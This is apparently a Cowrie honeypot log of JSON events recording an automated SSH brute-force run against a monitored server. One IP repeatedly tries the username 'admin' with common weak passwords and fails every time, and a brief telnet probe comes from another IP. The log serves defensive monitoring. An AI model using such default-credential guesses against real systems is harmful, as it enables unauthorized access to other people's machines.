{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:07.867977Z","src_ip":"87.120.191.13","session":"0b66e805d816"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:08.639704Z","src_ip":"87.120.191.13","session":"0b66e805d816"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:09.662051Z","src_ip":"87.120.191.13","session":"0b66e805d816"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":48574,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac5890df1dc8","protocol":"ssh","message":"New connection: 87.120.191.13:48574 (1.2.3.4:22) [session: ac5890df1dc8]","sensor":"my-vps","timestamp":"2025-08-26T01:54:09.683661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:09.684719Z","src_ip":"87.120.191.13","session":"ac5890df1dc8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:09.711990Z","src_ip":"87.120.191.13","session":"ac5890df1dc8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nimda","message":"login attempt [admin/nimda] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:09.779444Z","src_ip":"87.120.191.13","session":"ac5890df1dc8"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:10.803831Z","src_ip":"87.120.191.13","session":"ac5890df1dc8"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":48608,"dst_ip":"1.2.3.4","dst_port":22,"session":"81bdede11c67","protocol":"ssh","message":"New connection: 87.120.191.13:48608 (1.2.3.4:22) [session: 81bdede11c67]","sensor":"my-vps","timestamp":"2025-08-26T01:54:10.823152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:10.826746Z","src_ip":"87.120.191.13","session":"81bdede11c67"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:10.853876Z","src_ip":"87.120.191.13","session":"81bdede11c67"}
{"eventid":"cowrie.login.failed","username":"admin","password":"11","message":"login attempt [admin/11] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:10.952538Z","src_ip":"87.120.191.13","session":"81bdede11c67"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:11.986333Z","src_ip":"87.120.191.13","session":"81bdede11c67"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":48672,"dst_ip":"1.2.3.4","dst_port":22,"session":"c57c5e94a809","protocol":"ssh","message":"New connection: 87.120.191.13:48672 (1.2.3.4:22) [session: c57c5e94a809]","sensor":"my-vps","timestamp":"2025-08-26T01:54:12.013691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:12.016044Z","src_ip":"87.120.191.13","session":"c57c5e94a809"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:12.060828Z","src_ip":"87.120.191.13","session":"c57c5e94a809"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin1234","message":"login attempt [admin/admin1234] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:12.141595Z","src_ip":"87.120.191.13","session":"c57c5e94a809"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:13.194647Z","src_ip":"87.120.191.13","session":"c57c5e94a809"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":48750,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd9e1a39f402","protocol":"ssh","message":"New connection: 87.120.191.13:48750 (1.2.3.4:22) [session: fd9e1a39f402]","sensor":"my-vps","timestamp":"2025-08-26T01:54:13.220837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:13.246350Z","src_ip":"87.120.191.13","session":"fd9e1a39f402"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:13.247176Z","src_ip":"87.120.191.13","session":"fd9e1a39f402"}
{"eventid":"cowrie.login.failed","username":"admin","password":"andylau","message":"login attempt [admin/andylau] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:13.456382Z","src_ip":"87.120.191.13","session":"fd9e1a39f402"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:14.514578Z","src_ip":"87.120.191.13","session":"fd9e1a39f402"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":46448,"dst_ip":"1.2.3.4","dst_port":22,"session":"f46c0122fc3e","protocol":"ssh","message":"New connection: 87.120.191.13:46448 (1.2.3.4:22) [session: f46c0122fc3e]","sensor":"my-vps","timestamp":"2025-08-26T01:54:14.533746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:14.566418Z","src_ip":"87.120.191.13","session":"f46c0122fc3e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:14.567104Z","src_ip":"87.120.191.13","session":"f46c0122fc3e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0123456","message":"login attempt [admin/0123456] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:14.842446Z","src_ip":"87.120.191.13","session":"f46c0122fc3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65079,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f4077a1ecfb","protocol":"telnet","message":"New connection: 212.227.235.229:65079 (1.2.3.4:23) [session: 0f4077a1ecfb]","sensor":"my-vps","timestamp":"2025-08-26T01:54:15.821781Z"}
{"eventid":"cowrie.session.closed","duration":0.072418212890625,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:15.894131Z","src_ip":"212.227.235.229","session":"0f4077a1ecfb"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:15.945355Z","src_ip":"87.120.191.13","session":"f46c0122fc3e"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":46456,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf9cb3a7bc78","protocol":"ssh","message":"New connection: 87.120.191.13:46456 (1.2.3.4:22) [session: bf9cb3a7bc78]","sensor":"my-vps","timestamp":"2025-08-26T01:54:16.012730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:16.199942Z","src_ip":"87.120.191.13","session":"bf9cb3a7bc78"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:16.202855Z","src_ip":"87.120.191.13","session":"bf9cb3a7bc78"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1111","message":"login attempt [admin/1111] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:17.504714Z","src_ip":"87.120.191.13","session":"bf9cb3a7bc78"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:18.562838Z","src_ip":"87.120.191.13","session":"bf9cb3a7bc78"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":46468,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1b1b98fdb6d","protocol":"ssh","message":"New connection: 87.120.191.13:46468 (1.2.3.4:22) [session: c1b1b98fdb6d]","sensor":"my-vps","timestamp":"2025-08-26T01:54:18.605035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:18.612209Z","src_ip":"87.120.191.13","session":"c1b1b98fdb6d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:18.630769Z","src_ip":"87.120.191.13","session":"c1b1b98fdb6d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1q2w3e4r","message":"login attempt [admin/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:18.706935Z","src_ip":"87.120.191.13","session":"c1b1b98fdb6d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:19.729225Z","src_ip":"87.120.191.13","session":"c1b1b98fdb6d"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":46478,"dst_ip":"1.2.3.4","dst_port":22,"session":"86e0eecd2841","protocol":"ssh","message":"New connection: 87.120.191.13:46478 (1.2.3.4:22) [session: 86e0eecd2841]","sensor":"my-vps","timestamp":"2025-08-26T01:54:19.748221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:19.749036Z","src_ip":"87.120.191.13","session":"86e0eecd2841"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:19.768991Z","src_ip":"87.120.191.13","session":"86e0eecd2841"}
{"eventid":"cowrie.login.failed","username":"admin","password":"4321","message":"login attempt [admin/4321] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:19.831586Z","src_ip":"87.120.191.13","session":"86e0eecd2841"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:20.854299Z","src_ip":"87.120.191.13","session":"86e0eecd2841"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":46480,"dst_ip":"1.2.3.4","dst_port":22,"session":"40207f5b9c74","protocol":"ssh","message":"New connection: 87.120.191.13:46480 (1.2.3.4:22) [session: 40207f5b9c74]","sensor":"my-vps","timestamp":"2025-08-26T01:54:20.873174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:20.873960Z","src_ip":"87.120.191.13","session":"40207f5b9c74"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:20.898555Z","src_ip":"87.120.191.13","session":"40207f5b9c74"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:20.970145Z","src_ip":"87.120.191.13","session":"40207f5b9c74"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:22.054250Z","src_ip":"87.120.191.13","session":"40207f5b9c74"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":46484,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0fdad4f3a2f","protocol":"ssh","message":"New connection: 87.120.191.13:46484 (1.2.3.4:22) [session: e0fdad4f3a2f]","sensor":"my-vps","timestamp":"2025-08-26T01:54:22.081224Z"}
